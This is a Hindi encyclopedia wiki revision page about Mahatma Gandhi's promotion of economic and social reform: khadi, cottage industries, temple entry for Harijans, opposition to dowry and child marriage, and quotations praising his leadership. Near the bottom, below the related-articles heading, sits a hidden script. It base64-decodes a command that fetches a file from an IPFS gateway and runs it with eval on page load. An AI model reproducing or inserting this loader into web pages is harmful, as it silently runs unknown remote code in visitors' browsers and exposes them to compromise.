महात्मा गाँधी आर्थिक-सामाजिक उन्नति के पक्षधर: Difference between revisions

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('thumb|चार्ली चैपलिन के साथ [[गाँधी जी...' के साथ नया पृष्ठ बनाया)
 
No edit summary
Line 27: Line 27:
==संबंधित लेख==
==संबंधित लेख==
{{महात्मा गाँधी}}{{स्वतन्त्रता सेनानी}}
{{महात्मा गाँधी}}{{स्वतन्त्रता सेनानी}}
[[Category:स्वतन्त्रता सेनानी]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]][[Category:जीवनी साहित्य]][[Category:महात्मा ]][[Category:राजनेता]][[Category:राजनीति कोश]][[Category:इतिहास कोश]]
[[Category:स्वतन्त्रता सेनानी]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]][[Category:जीवनी साहित्य]][[Category:महात्मा गाँधी]][[Category:राजनेता]][[Category:राजनीति कोश]][[Category:इतिहास कोश]]
__INDEX__
__INDEX__
{{सुलेख}}
{{सुलेख}}
__NOTOC__
__NOTOC__

Revision as of 13:10, 10 December 2016

[[चित्र:Charlie-chaplin-gandhiji.jpg|thumb|चार्ली चैपलिन के साथ गाँधी जी]] गाँधी जी ने रचनात्मक कार्यों को खूब महत्व दिया। वह केवल राजनीतिक स्वतंत्रता ही नहीं चाहते थे, अपितु जनता की आर्थिक, सामाजिक और आत्मिक उन्नति भी चाहते थे। इसी भावना से उन्होंने 'ग्राम उद्योग संघ', 'तालीमी सघ' एवं 'गो रक्षा संघ' की स्थापना की थी। गाँधी जी ने समाज में व्याप्त शोषण की नीति को खत्म करने के लिए भूमि एवं पूंजी का समाजीकरण न करते हुए आर्थिक क्षेत्र में विकेन्द्रीकरण को महत्व दिया।

मंदिर प्रवेश कार्यक्रम

महात्मा गाँधी ने लघु एवं कुटीर उद्योगों को भारी उद्योगों से अधिक महत्व दिया। खादी को गाँधी जी ने अपना मुख्य कार्यक्रम बनाया। गाँधी जी समाज में फैली हुई कुरीतियों एवं असमानताओं के प्रति जीवन भर संघर्षरत रहे। उन्होंने अछूतों को 'हरिजन' की संज्ञा दी। हरिजनों के लिए अन्य हिन्दुओं के साथ समानता प्राप्त करने के लिए गाँधी जी ने 'मंदिर प्रवेश' कार्यक्रम को सर्वाधिक प्राथमिकता दी।

कुरीतियों के आलोचक

स्त्रियों की स्थिति सुधारने के लिए उन्होंने दहेज प्रथा उन्मूलन के लिए अथक प्रयत्न किया। वे बाल विवाह और पर्दा प्रथा के कटु आलोचक थे। वे विधवा पुर्नविवाह के समर्थक और शराब बंदी लागू करने के बहुत इच्छुक थे।

राजनीति में बड़ी देन

गाँधी जी की राजनीति को सबसे बड़ी देन यह है कि उन्होंने राजनीति को नैतिकता पर आधारित किया। अहिंसात्मक असहयोग आंदोलन तथा सविनय अवज्ञा आंदोलन की उनकी नीति भारतीय परिस्थितियों के अधिक अनकूल थी। भारत सचिव मांटेग्यू ने गाँधी जी को 'हवा में रहना वाला शुद्ध दार्शनिक' कहा था, लेकिन उसी दार्शनिक ने अंग्रेज़ साम्राज्य की जड़ें हिला दीं तथा समाज में मौलिक परिवर्तन कर दिया।

महापुरुष कथन

  1. गाँधी जी के बारे में के. एम. मुंशी ने कहा है कि- "उन्होंने अराजकता पायी और उसे व्यवस्था में परिवर्तित कर दिया, कायरता पायी ओर उसे साहस में बदल दिया, अनेक वर्गों में विभाजित जनसमूह को राष्ट्र में बदल दिया, निराशा को सौभाग्य में बदल दिया, और बिना किसी प्रकार की हिंसा या सैनिक शक्ति का प्रयोग किये एक साम्राज्यवादी शक्ति के बन्धनों का अंत कर विश्व शक्ति को जन्म दिया।"
  2. विस्काउन्ट सेमुअल ने गाँधी जी के बारे में कहा है कि- "गाँधी जी ने अपना नेतृत्व प्रदान कर भारतीय जनता को अपनी कमर सीधी करना सिखाया। अपनी आंखें ऊपर उठाना सिखाया तथा अवचिल दृष्टि से परिस्थितियों का सामना करना सिखाया। सचमुच महात्मा भारतीय राजनीति और राष्ट्र के महान स्रोत थे।"



left|30px|link=महात्मा गाँधी का इतिहास में स्थान|पीछे जाएँ महात्मा गाँधी आर्थिक-सामाजिक उन्नति के पक्षधर right|30px|link=महात्मा गाँधी|आगे जाएँ


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

सुव्यवस्थित लेख|link=भारतकोश:सुव्यवस्थित लेख